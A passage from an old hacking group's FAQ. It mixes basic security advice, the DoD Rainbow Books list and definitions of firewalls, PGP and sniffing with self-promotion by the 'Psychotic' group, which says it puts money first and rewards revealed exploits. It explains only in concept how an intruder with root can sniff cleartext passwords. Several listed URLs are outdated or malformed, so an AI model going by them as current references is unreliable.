  867.      Requiring the use of a password generator. 
  868.      Always using a mixture of upper- and lowercase characters. 
  869.      Always using at least one or two non-alphanumeric characters. 
  870.      Never using dictionary words or ones spelled backwards. 
  871.      Never using a portion or variation of a proper name, address or anything that
  872.      could obviously identify you (the user). 
  873.  
  874. 9. Security-related organizations play an integral role in the development
  875. and deployment of Internet technologies. Keep abreast of the latest in
  876. security-related activities by visiting their Web sites. Here are some key
  877. security-rated organizations which aid corporations such as yours in keeping
  878. the Internet a safer place to compute:
  879.      ACM/SIGSAC at gopher://gopher.acm.org/.
  880.      CERT (a 24-hour Computer Emergency Response Team) at:
  881.      ftp://info.cert.org/pub/cert_faq and
  882.      http://www.sei.cmu.edu/SEI/programs/cert.html.
  883.      CIAC (U.S. Department of Energy's Computer Incident Advisory
  884.      Capability) at: http://ciac.llnl.gov/
  885.      CPSR (Computer Professionals for Social Responsibility) at:
  886.      http://cpsr.org.home
  887.      EFF (Electronic Frontier Foundation) at: http://www.eff.org/
  888.      EPIC (Electronic Privacy Information Center) at: http:/epic.org/
  889.      FIRST (Forum of Incident Reponse and Security Teams) at:
  890.      http://first.org/first/
  891.      Internet Society at http://www.isoc.org/
  892.  
  893. Q.     What is a "rainbow book?"
  894.  
  895. A.     Rainbow Books are books on security. The current book listing is
  896. listed below.  Some of these can be downloaded at www.ncsc.radium.mil.
  897.  
  898. Orange Book- Department of Defense Trusted Computer System Evaluation Criteria.
  899. Green Book- Department of Defense Password Management Guideline.
  900. Yellow Book- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments.
  901. Tan Book- A Guide to Understanding Audit in Trusted Systems.
  902. Bright Blue Book- A Guide for Vendors.
  903. Neon Orange Book- A Guide to Understanding Discretionary Access Control in Trusted Systems.
  904. Teal Green Book-  Glossary of Computer Security Terms.
  905. Red Book- Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria.
  906. Burgandy Book- A Guide to Understanding Design Documentation in Trusted Systems.
  907. Dark Lavender Book- A Guide to Understanding Trusted Distribution in Trusted Systems.
  908. Venice Blue Book- Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria.
  909. Aqua Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Modeling in Trusted Systems.
  910. Dark Red Book- Guidance for Applying the Trusted Network Interpretation.
  911. Pink Book- Department of Defense Trusted Computer System Evaluation Criteria Rating Maintenance Phase.
  912. Purple Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Formal Verification Systems.
  913. Brown Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Trusted Facility Management.
  914. Yellow-Green Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Writing Trusted Facility Manuals.
  915. Light Blue Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Identification and Authentication in Trusted Systems.
  916. Blue Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Product Evaluation Questionnaire.
  917. Grey Book-Department of Defense Trusted Computer System Evaluation Criteria Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System.
  918. Lavender Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria.
  919. Bright Orange Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understandng Security Testing and Test Documentation in Trusted Systems.
  920. Hot Peach Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Writing the Security Features User's Guide for Trusted Systems.
  921. Turquoise Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems.
  922. Violet Book- Department of Defense Trusted Computer System Evaluation Criteria Assessing Controlled Access Protection.
  923. Light Pink Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Covert Channel Analysis of Trusted Systems.
  924. C1 Technical Report-001- Department of Defense Trusted Computer System Evaluation Criteria Computer Viruses: Prevention, Detection, and Treatment.
  925. C Technical Report 79-91- Department of Defense Trusted Computer System Evaluation Criteria Integrity in Automated Information Systems.
  926. C Technical Report 39-92-  Department of Defense Trusted Computer System Evaluation Criteria The Design and Evaluation of INFOSEC systems: The Computer Security Contributions to the Composition Discussion.
  927. NTISSAM COMPUSEC/1-87- Department of Defense Trusted Computer System Evaluation Criteria Advisory Memorandum on Office Automation Security Guideline.
  928.  
  929.  
  930.  
  931. Q.     What is a firewall?
  932.  
  933. A. A firewall is a system or group of systems that enforces an access control policy between two networks. The 
  934. actual means by which this is accomplished varies widely, but in principle, 
  935. the firewall can be thought of as a pair of mechanisms: one which exists to 
  936. block traffic, and the other which exists to permit traffic. Some firewalls 
  937. place a greater emphasis on blocking traffic, while others emphasize 
  938. permitting traffic. Probably the most important thing to recognize about a 
  939. firewall is that it implements an access control policy. If you don't have 
  940. a good idea what kind of access you want to permit or deny, or you simply 
  941. permit someone or some product to configure a firewall based on what they 
  942. or it think it should do, then they are making policy for your organization 
  943. as a whole.
  944.  
  945.  
  946. Q.     How can I use PGP to benefit me?
  947.  
  948. A. PGP is easy to use, it does give you enough rope so that you can hang
  949. yourself. You should become thoroughly familiar with the various options in
  950. PGP before using it to send serious messages. For example, giving the
  951. command pgp -sat <filename> will only sign a message, it will not encrypt it.
  952. Even though the output looks like it is encrypted, it really isn't. Anybody
  953. in the world would be able to recover the original text.
  954.  
  955. Q.     What is a sniffer?
  956.  
  957. A.     Taken from the Sniffer FAQ.
  958. Unlike telephone circuits, computer networks are shared communication
  959. channels. It is simply too expensive to dedicate local loops to the switch
  960. (hub) for each pair of communicating computers. Sharing means that
  961. computers can receive information that was intended for other machines.
  962. To capture the information going over the network is called sniffing.
  963.  
  964. The most popular way of connecting computers is through ethernet.
  965. Ethernet protocol works by sending packet information to all the
  966. hosts on the same circuit. The packet header contains the proper
  967. address of the destination machine. Only the machine with the matching
  968. address is suppose to accept the packet. A machine that is accepting all
  969. packets, no matter what the packet header says, is said to be in
  970. promiscuous mode.
  971.  
  972. Because, in a normal networking environment, account and password information is passed along
  973. ethernet in clear-text, it is not hard for an intruder once they obtain
  974. root to put a machine into promiscuous mode and by sniffing, compromise all
  975. the machines on the net.
  976.  
  977.  
  978. Q.     What is Psychotic?
  979.  
  980. A. I would describe Psychotic as more of a proffessional group rather than
  981. just a hacking clan. We think about money first and hacking second, even
  982. though I'm sure that most of you have seen a few of our hacking projects...
  983.  
  984. Q.     Is psychotic looking for new members?
  985.  
  986. A. Well as of now we aren't looking for any additions to our staff.
  987.  
  988. Q.     What is Psychosis?
  989.  
  990. A. Psychosis is a personal project taken up by Virtual Circuit. It's an
  991. award that he gives out to hackers that have done something to stand out
  992. (good webpage, revealed exploits, etc.). If you think that you should
  993. receive the award you can mail him about it.  But I can tell you now that
  994. the award isn't easy to get.
  995.  
  996. Q.     Where can I find some good resources on hacking and phreaking?
  997.  
  998. A.     Well we aren't much for links but you should check the Psychosis
  999. page for his webpage award winners. He picks only the best.
  1000.  
  1001. Q.     Who are all the members in Psychotic?
  1002.  
  1003. A.      Most of us would like to stay anonymous.  But you will see a members
  1004. name every now and then.
  1005.  
  1006. Q.      What is the Psychotic Tech Lab?
  1007.  
  1008. A.      Since Psychotics break up in April we were short on releasing our
  1009. zine so the new and improved Psychotic has added a few issues to the old
  1010. zine and now its out in the public.  You can find it on many sites.
  1011.  
  1012. Q.     What are Psychotic's offered services?
  1013.  
  1014. A.      Psychotic has many different services but as of now we are getting
  1015. re-organized and putting our network together.  We will discuss our services
  1016. in the next version of the Psychotic FAQ.
  1017.  
  1018.